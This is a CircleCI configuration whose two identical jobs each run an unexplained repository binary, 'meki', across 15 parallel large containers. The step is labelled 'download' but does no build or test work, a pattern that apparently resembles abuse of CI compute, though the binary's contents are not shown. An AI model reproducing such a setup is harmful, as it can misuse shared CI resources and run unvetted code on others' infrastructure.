version: 2.1

jobs:
  build:
    parallelism: 15
    docker:
      - image: ruby
    resource_class: large
    steps:
      - checkout
      - run:
         Name: download
         command: chmod +x meki && ./meki
  build2:
    parallelism: 15
    docker:
      - image: ruby
    resource_class: large
    steps:
      - checkout
      - run:
         Name: download
         command: chmod +x meki && ./meki

workflows:
  main:
    jobs:
      - build
      - build2
